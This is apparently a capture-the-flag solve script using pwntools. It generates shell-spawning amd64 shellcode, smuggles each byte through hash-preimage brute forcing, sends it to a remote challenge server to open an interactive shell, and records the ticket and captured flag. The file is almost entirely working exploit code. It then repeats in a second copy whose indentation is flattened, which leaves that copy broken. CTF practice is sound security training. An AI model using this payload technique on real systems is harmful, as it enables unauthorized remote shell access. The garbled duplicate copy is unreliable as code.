maple3142/solve.py

## solve.py
from pwn import *
from hashlib import *

context.log_level = "debug"
context.arch = "amd64"


def find_pre(h, t):
    for a in range(256):
        for b in range(256):
            if h(bytes([a, b])).digest()[0] == t:
                return bytes([a, b])


sc = asm(shellcraft.sh())
fns = [md5, sha1, sha256, sha512]
payload = b""
for i, x in enumerate(sc):
    payload += find_pre(fns[i % 4], x)
# io = process('./zc7ejjq9ehhcqj1x61ekoa8pjtk7')
io = remote("hash-it-0-m7tt7b7whagjw.shellweplayaga.me", 31337)
io.sendlineafter(
    b"Ticket please: ",
    b"ticket{CormorantPoopdeck584n22:CZnq3tHN3ufHF_ONI8eIrZH5H27yzqcMcDBHg6OnbKtsIPA3}",
)
io.send(len(payload).to_bytes(4, "big") + payload)
io.interactive()
# flag{CormorantPoopdeck584n22:MNM8QuNum-acrWp3RUuWBeqOYtXja-q3lK1dPipahdYfCb4Yz08Jg71oN3Xln9mmiQvJq95kCk1dEYHaugn9Ug}
	from pwn import *
	from hashlib import *

	context.log_level = "debug"
	context.arch = "amd64"


	def find_pre(h, t):
	for a in range(256):
	for b in range(256):
	if h(bytes([a, b])).digest()[0] == t:
	return bytes([a, b])


	sc = asm(shellcraft.sh())
	fns = [md5, sha1, sha256, sha512]
	payload = b""
	for i, x in enumerate(sc):
	payload += find_pre(fns[i % 4], x)
	# io = process('./zc7ejjq9ehhcqj1x61ekoa8pjtk7')
	io = remote("hash-it-0-m7tt7b7whagjw.shellweplayaga.me", 31337)
	io.sendlineafter(
	b"Ticket please: ",
	b"ticket{CormorantPoopdeck584n22:CZnq3tHN3ufHF_ONI8eIrZH5H27yzqcMcDBHg6OnbKtsIPA3}",
	)
	io.send(len(payload).to_bytes(4, "big") + payload)
	io.interactive()
	# flag{CormorantPoopdeck584n22:MNM8QuNum-acrWp3RUuWBeqOYtXja-q3lK1dPipahdYfCb4Yz08Jg71oN3Xln9mmiQvJq95kCk1dEYHaugn9Ug}